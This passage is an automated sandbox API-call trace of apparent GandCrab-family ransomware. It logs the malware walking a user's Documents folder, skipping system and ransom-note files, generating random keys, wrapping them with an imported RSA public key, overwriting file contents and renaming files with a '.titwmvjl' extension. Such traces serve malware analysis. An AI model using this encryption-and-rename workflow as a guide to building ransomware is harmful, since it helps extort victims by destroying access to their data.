lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\PGPibvMt.pps.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\pgpibvmt.pps.titwmvjl"), dwFlags=0x1) returned 1 [0090.799] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.800] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0090.800] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0090.800] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0090.800] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\TITWMVJL-DECRYPT.txt" [0090.800] lstrlenW (lpString=".titwmvjl") returned 9 [0090.800] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\TITWMVJL-DECRYPT.txt") returned 91 [0090.800] VirtualAlloc (lpAddress=0x0, dwSize=0xf6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.800] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 100 [0090.800] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\TITWMVJL-DECRYPT.txt") returned 91 [0090.800] lstrlenW (lpString=".txt") returned 4 [0090.800] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.800] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0090.800] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0090.800] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.800] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\TITWMVJL-DECRYPT.txt") returned 91 [0090.800] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\TITWMVJL-DECRYPT.txt") returned 91 [0090.800] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0090.800] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0090.800] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0090.801] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0090.801] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0090.801] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0090.801] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0090.801] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0090.801] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.801] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0090.801] FindClose (in: hFindFile=0x503838 | out: hFindFile=0x503838) returned 1 [0090.801] CloseHandle (hObject=0x2bc) returned 1 [0090.801] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0090.801] lstrcmpW (lpString1="ZNcrgZDa54J.xls", lpString2=".") returned 1 [0090.801] lstrcmpW (lpString1="ZNcrgZDa54J.xls", lpString2="..") returned 1 [0090.802] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\", lpString2="ZNcrgZDa54J.xls" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls" [0090.802] lstrlenW (lpString=".titwmvjl") returned 9 [0090.802] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls") returned 70 [0090.802] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.802] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls.titwmvjl") returned 79 [0090.802] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls") returned 70 [0090.802] lstrlenW (lpString=".xls") returned 4 [0090.802] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.802] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xls ") returned 5 [0090.802] lstrcmpiW (lpString1=".xls", lpString2=".titwmvjl") returned 1 [0090.802] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.802] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls") returned 70 [0090.802] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls") returned 70 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="desktop.ini") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="autorun.inf") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="ntuser.dat") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="iconcache.db") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="bootsect.bak") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="boot.ini") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="ntuser.dat.log") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="thumbs.db") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="KRAB-DECRYPT.html") returned 1 [0090.802] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="CRAB-DECRYPT.html") returned 1 [0090.803] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.803] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.803] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="ntldr") returned 1 [0090.803] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="NTDETECT.COM") returned 1 [0090.803] lstrcmpiW (lpString1="ZNcrgZDa54J.xls", lpString2="Bootfont.bin") returned 1 [0090.803] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls") returned 70 [0090.803] lstrlenW (lpString=".xls") returned 4 [0090.803] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.803] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xls ") returned 5 [0090.803] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.803] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.803] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\zncrgzda54j.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0090.804] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.804] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0090.804] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.804] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.804] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0090.805] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.805] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.805] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.805] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0090.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.805] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.805] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.806] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0090.806] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.806] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.806] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.806] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0090.806] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.806] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.806] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.807] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0090.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.807] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5038f8) returned 1 [0090.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.808] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0090.808] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.808] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0090.808] GetLastError () returned 0x0 [0090.808] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.808] CryptDestroyKey (hKey=0x5038f8) returned 1 [0090.808] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.808] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.808] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.808] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0090.809] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.809] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503738) returned 1 [0090.809] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.809] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0090.809] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.809] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0090.810] GetLastError () returned 0x0 [0090.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.810] CryptDestroyKey (hKey=0x503738) returned 1 [0090.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.810] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.810] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.810] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.810] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x2d2c, lpOverlapped=0x0) returned 1 [0090.816] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffffd2d4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.816] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2d2c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x2d2c, lpOverlapped=0x0) returned 1 [0090.817] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0090.818] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.821] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.822] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.822] CloseHandle (hObject=0x2bc) returned 1 [0090.822] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\zncrgzda54j.xls"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\ZNcrgZDa54J.xls.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\zncrgzda54j.xls.titwmvjl"), dwFlags=0x1) returned 1 [0090.823] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.823] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0090.823] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0090.824] CloseHandle (hObject=0x2b4) returned 1 [0090.824] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0090.824] lstrcmpW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2=".") returned 1 [0090.824] lstrcmpW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="..") returned 1 [0090.824] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\", lpString2="VST Y0uLtO6PgOIQ1J0Z.rtf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf" [0090.838] lstrlenW (lpString=".titwmvjl") returned 9 [0090.838] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf") returned 67 [0090.838] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.838] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf.titwmvjl") returned 76 [0090.838] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf") returned 67 [0090.838] lstrlenW (lpString=".rtf") returned 4 [0090.838] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.838] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".rtf ") returned 5 [0090.838] lstrcmpiW (lpString1=".rtf", lpString2=".titwmvjl") returned -1 [0090.838] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.838] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf") returned 67 [0090.838] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf") returned 67 [0090.838] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="desktop.ini") returned 1 [0090.838] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="autorun.inf") returned 1 [0090.838] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="ntuser.dat") returned 1 [0090.838] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="iconcache.db") returned 1 [0090.838] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="bootsect.bak") returned 1 [0090.838] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="boot.ini") returned 1 [0090.838] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="ntuser.dat.log") returned 1 [0090.838] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="thumbs.db") returned 1 [0090.838] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.838] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.839] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="KRAB-DECRYPT.html") returned 1 [0090.839] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="CRAB-DECRYPT.html") returned 1 [0090.839] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.839] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.839] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="ntldr") returned 1 [0090.839] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="NTDETECT.COM") returned 1 [0090.839] lstrcmpiW (lpString1="VST Y0uLtO6PgOIQ1J0Z.rtf", lpString2="Bootfont.bin") returned 1 [0090.839] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf") returned 67 [0090.839] lstrlenW (lpString=".rtf") returned 4 [0090.839] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.839] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".rtf ") returned 5 [0090.839] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.839] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.839] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\VST Y0uLtO6PgOIQ1J0Z.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\vst y0ulto6pgoiq1j0z.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0090.840] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.840] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0090.841] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.841] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.841] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0090.841] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.842] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.842] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.842] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0090.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.842] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.842] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.842] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0090.843] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.843] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.843] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.843] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0090.843] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.843] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.843] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.844] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0090.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.844] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503738) returned 1 [0090.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.845] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0090.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.845] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0090.845] GetLastError () returned 0x0 [0090.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.845] CryptDestroyKey (hKey=0x503738) returned 1 [0090.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.845] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.845] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0090.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.846] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0090.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.846] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0090.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.846] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, 